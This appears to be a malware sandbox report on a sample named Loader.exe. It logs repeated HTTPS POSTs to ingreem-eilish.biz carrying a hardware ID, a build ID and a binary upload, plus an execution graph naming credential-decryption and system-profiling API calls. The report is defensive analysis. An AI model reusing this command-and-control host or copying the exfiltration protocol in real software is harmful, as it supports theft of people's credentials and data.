2024-12-20 16:41:48 UTC | 12800 | OUT | Data Raw: 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 4f 39 53 43 50 53 36 54 56 48
Data Ascii: --O9SCPS6TVHZContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--O9SCPS6TVHZContent-Disposition: form-data; name="pid"2--O9SCPS6TVHZContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--O9SCPS6TVH
2024-12-20 16:41:49 UTC | 1049 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bkluelm2a8s5kqstgf6r48n8c8; expires=Tue, 15-Apr-2025 10:28:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSqLIVx%2BvulCGfFnW92sRm2pMmdQbCcDi8LmQ6dEd3gGPzKOGg%2BoCAdcM%2BgwRTlClVyd07LuDMULnN%2FJI%2B5lJ%2BduR5DKWKirgeCqlTppFbnOYcn%2FzGZ2VpPkHsrKxYoA42i3IzM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f5115002cec180d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1626&rtt_var=623&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13735&delivery_rate=1795817&cwnd=201&unsent_bytes=0&cid=dd3dab1b34552bfc&ts=794&x=0"
2024-12-20 16:41:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:41:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49773 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:50 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XPBUSMJF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15024
Host: ingreem-eilish.biz
2024-12-20 16:41:50 UTC | 15024 | OUT | Data Raw: 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 58 50 42 55 53 4d 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44
Data Ascii: --XPBUSMJFContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--XPBUSMJFContent-Disposition: form-data; name="pid"2--XPBUSMJFContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--XPBUSMJFContent-D
2024-12-20 16:41:51 UTC | 1053 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=upitb5gjoait2p9ejqnmscb455; expires=Tue, 15-Apr-2025 10:28:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAUybXU4W5xk399ux8Qnhd46ZV8RbBsR3UHmcsXT%2BVVWNjVBWE2bswLLMhsaBL0%2FUNK6EpBgiStq2Ha%2BvXt807FqawL%2BAe%2FAceiSKs%2Bp6jV%2F5UpzncJdYtkFzxLA%2FN%2BfVVyZaiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f51150dac097279-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1784&rtt_var=690&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15956&delivery_rate=1562332&cwnd=220&unsent_bytes=0&cid=7d2ab8c79e6c8a42&ts=811&x=0"
                                                                                      2024-12-20 16:41:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-20 16:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49780 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:53 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3905CUVZJU7SA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20544
Host: ingreem-eilish.biz
2024-12-20 16:41:53 UTC | 15331 | OUT | Data Raw: 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 39 30 35 43 55 56 5a 4a 55 37 53 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 33 39 30 35
Data Ascii: --3905CUVZJU7SAContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--3905CUVZJU7SAContent-Disposition: form-data; name="pid"3--3905CUVZJU7SAContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--3905
2024-12-20 16:41:53 UTC | 5213 | OUT | Data Raw: 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00
Data Ascii: 'F3Wun 4F([:7s~X`nO`i
2024-12-20 16:41:54 UTC | 1046 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pvnm7pcr77efra08s80nk5gc9g; expires=Tue, 15-Apr-2025 10:28:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bgv%2FPLKDM4F5jAUwgESKHtaHQneLwEOdskX%2BhkFrYQBw4sULTH%2BSQdtf%2Ba3%2BfeRncVxrvZKwYlaJZzScVCPI3nXkmMNhhKmSgqHvQi9LEu3JxMaU5BB6MijqnGsWbQnJfs2usBc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f51151dfee10f9d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1652&rtt_var=635&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21503&delivery_rate=1703617&cwnd=193&unsent_bytes=0&cid=80fbfb6220fe826a&ts=917&x=0"
2024-12-20 16:41:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:41:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49786 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:55 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UB51S031P6CFI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1230
Host: ingreem-eilish.biz
2024-12-20 16:41:55 UTC | 1230 | OUT | Data Raw: 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 42 35 31 53 30 33 31 50 36 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 55 42 35 31
Data Ascii: --UB51S031P6CFIContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--UB51S031P6CFIContent-Disposition: form-data; name="pid"1--UB51S031P6CFIContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--UB51
2024-12-20 16:41:56 UTC | 1043 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r8rigetc9kkjn6skt8gdeqp0sr; expires=Tue, 15-Apr-2025 10:28:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUDzw6eJz00C3eLGQ4zgioVtaz8b52j8jzc%2B%2BBL6XM1wd9UgdpfBKDh%2B6w7dUTIcDIGngOxhh0lsOwEYtfLuQEaH%2B67AmY6Vlu6y%2B6IMEKAQ7vu9gwF83GuM0b1ugn4HJ4fFhdQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f51152dab8ec334-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1642&rtt_var=648&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2144&delivery_rate=1646926&cwnd=247&unsent_bytes=0&cid=23074676cf024360&ts=680&x=0"
2024-12-20 16:41:56 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:41:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49792 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:41:57 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AL2QEEAZ77KV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1093
Host: ingreem-eilish.biz
2024-12-20 16:41:57 UTC | 1093 | OUT | Data Raw: 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36 0d 0a 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4c 32 51 45 45 41 5a 37 37 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 0d 0a 2d 2d 41 4c 32 51 45 45 41
Data Ascii: --AL2QEEAZ77KVContent-Disposition: form-data; name="hwid"A313BACE34A2B05E25E054D164A37606--AL2QEEAZ77KVContent-Disposition: form-data; name="pid"1--AL2QEEAZ77KVContent-Disposition: form-data; name="lid"HpOoIh--b58c2f805636--AL2QEEA
2024-12-20 16:41:59 UTC | 1048 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:41:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8j1md37tfgc26tio5m04va1nod; expires=Tue, 15-Apr-2025 10:28:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88HP2xnKzjttUfS%2B%2F%2FCBQtkOVD7%2Bag6DaPEED6RJJm0OoEdiX%2FV4qG6scy239NhKfevXfOwHWzCpDf5QKTB1xD3DxmFaMZeeZ2QH4HarE87VZ2dxcbyLR%2FKs%2FBtlN4ua95rdrag%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f511539dabd4299-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1720&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2006&delivery_rate=1643218&cwnd=251&unsent_bytes=0&cid=1ef9fe110a2215b7&ts=1708&x=0"
2024-12-20 16:41:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-20 16:41:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49799 | 104.21.90.135 | 443 | 6448 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 16:42:00 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 121
Host: ingreem-eilish.biz
2024-12-20 16:42:00 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 35 38 63 32 66 38 30 35 36 33 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 41 33 31 33 42 41 43 45 33 34 41 32 42 30 35 45 32 35 45 30 35 34 44 31 36 34 41 33 37 36 30 36
Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b58c2f805636&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=A313BACE34A2B05E25E054D164A37606
2024-12-20 16:42:01 UTC | 1043 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:42:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=m8npprpufnbjsou27p7feev2pc; expires=Tue, 15-Apr-2025 10:28:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ja%2BHLHiGk%2BB0RpMoemnyNUfPKKJ0CyX4KDkzgOAWaH4lQELGgWMVR3opkqAS1nW9JYk9UKdCvv6waXpZB1UaHls1q%2Bp1ts%2FfZ0J4qTySbpLCczSDZryBWgUX%2FDjiJSIKh6ICzY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f51154cef6b5e6e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1585&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1024&delivery_rate=1842271&cwnd=235&unsent_bytes=0&cid=b30f812b32f84506&ts=835&x=0"
2024-12-20 16:42:01 UTC | 54 | IN | Data Raw: 33 30 0d 0a 34 45 47 36 52 67 58 54 46 6e 50 46 77 71 48 33 51 47 78 67 75 74 4c 4a 33 30 79 76 67 5a 78 69 49 6c 51 37 35 48 43 72 76 76 79 37 48 41 3d 3d 0d 0a
Data Ascii: 304EG6RgXTFnPFwqH3QGxgutLJ30yvgZxiIlQ75HCrvvy7HA==
2024-12-20 16:42:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 1
Start time: 11:41:22
Start date: 20/12/2024
Path: C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Loader.exe"
Imagebase: 0xef0000
File size: 3'208'704 bytes
MD5 hash: 99604EF7EBF56A566A0CDB4B6BB0FA08
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 6.2%
Dynamic/Decrypted Code Coverage: 80.3%
Signature Coverage: 52%
Total number of Nodes: 304
Total number of Limit Nodes: 22
[execution_graph: node and edge dump of the interactive execution graph widget (truncated in this extraction). API calls named on the graph nodes: LdrInitializeThunk, RtlFreeHeap, RtlAllocateHeap, RtlReAllocateHeap, NtAllocateVirtualMemory, GetPEB, CoSetProxyBlanket, CoInitializeEx, CoUninitialize, ExitProcess, GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow, GetLogicalDrives, FreeLibrary, LoadLibraryExW, GetProcAddress, GetLastError, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, CryptUnprotectData; CRT internals ___vcrt_uninitialize_ptd, ___vcrt_uninitialize_locks, ___vcrt_FlsSetValue.]
afeed0 GetPEB 19697->19698 19699 afee00 19698->19699 19700 afebf0 GetPEB 19699->19700 19700->19683 19702 afeb7c 19701->19702 19702->19677 19898 aff5c0 19899 afeed0 GetPEB 19898->19899 19900 aff5e8 19899->19900 19901 afebf0 GetPEB 19900->19901 19902 aff5ee NtProtectVirtualMemory 19901->19902 19905 aff61d 19902->19905 19903 aff70c 19904 afeed0 GetPEB 19904->19905 19905->19903 19905->19904 19906 afebf0 GetPEB 19905->19906 19907 aff6ee NtProtectVirtualMemory 19906->19907 19907->19905 19703 4105f3 19705 41060d 19703->19705 19706 40edbb 19705->19706 19707 414c00 19705->19707 19708 414c20 19707->19708 19708->19708 19711 43e430 19708->19711 19710 414d51 19713 43e450 19711->19713 19712 43e57e 19712->19710 19713->19712 19715 43c330 LdrInitializeThunk 19713->19715 19715->19712 19716 43a970 19717 43a990 19716->19717 19719 43a9ee 19717->19719 19724 43c330 LdrInitializeThunk 19717->19724 19721 43abd1 19719->19721 19723 43aaee 19719->19723 19725 43c330 LdrInitializeThunk 19719->19725 19720 43a940 RtlFreeHeap 19720->19721 19723->19720 19724->19719 19725->19723 19726 40a573 19727 40a588 19726->19727 19730 40a8c0 19727->19730 19733 40a8f0 19730->19733 19731 40a591 19732 43a940 RtlFreeHeap 19732->19731 19733->19731 19733->19732 19734 40c5f5 CoInitializeSecurity 19735 43c7fb 19737 43c840 19735->19737 19736 43c99e 19737->19736 19739 43c330 LdrInitializeThunk 19737->19739 19739->19736 19908 4322b8 19911 414160 19908->19911 19910 4322bd CoSetProxyBlanket 19911->19910 19912 40c63c 19913 40c650 19912->19913 19918 437bc0 19913->19918 19915 40c6c9 19916 437bc0 11 API calls 19915->19916 19917 40caf9 19916->19917 19919 437bf0 CoCreateInstance 19918->19919 19921 437df3 SysAllocString 19919->19921 19922 438205 19919->19922 19925 437e6f 19921->19925 19923 438215 GetVolumeInformationW 19922->19923 19932 43822c 19923->19932 19926 4381f1 SysFreeString 19925->19926 19927 437e7e CoSetProxyBlanket 19925->19927 19926->19922 19928 4381e7 19927->19928 19929 437e9e SysAllocString 19927->19929 19928->19926 
19931 437f70 19929->19931 19931->19931 19933 437fbb SysAllocString 19931->19933 19932->19915 19935 437fe2 19933->19935 19934 4381d2 SysFreeString SysFreeString 19934->19928 19935->19934 19936 4381c8 19935->19936 19937 43802d VariantInit 19935->19937 19936->19934 19939 438080 19937->19939 19938 4381b7 VariantClear 19938->19936 19939->19938 19740 42db7f 19741 42dba3 19740->19741 19742 42dc5b FreeLibrary 19741->19742 19743 42dc6e 19742->19743 19744 42dc7e GetComputerNameExA 19743->19744 19746 42dcd0 GetComputerNameExA 19744->19746 19747 42dda0 19746->19747 19940 43ccbd 19941 43cce0 19940->19941 19944 43c330 LdrInitializeThunk 19941->19944 19943 43cd58 19944->19943

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437DE2
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00437E47
                                                                                        • CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E90
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00437EE8
                                                                                        • SysAllocString.OLEAUT32(F9BDF745), ref: 00437FC0
                                                                                        • VariantInit.OLEAUT32(?), ref: 00438032
                                                                                        • VariantClear.OLEAUT32(?), ref: 004381B8
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004381DC
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004381E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
                                                                                        • String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
                                                                                        • API String ID: 3490847348-109390196
                                                                                        • Opcode ID: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                        • Instruction ID: 8131ac09c1f2c8c7a662361a942698708379fad2ab2868bed6bea96b7e7f230e
                                                                                        • Opcode Fuzzy Hash: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                        • Instruction Fuzzy Hash: 2312DEB2A083519BD720CF68C88475BFBE1EBC9714F194A2DF9D497390D778D8058B86

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
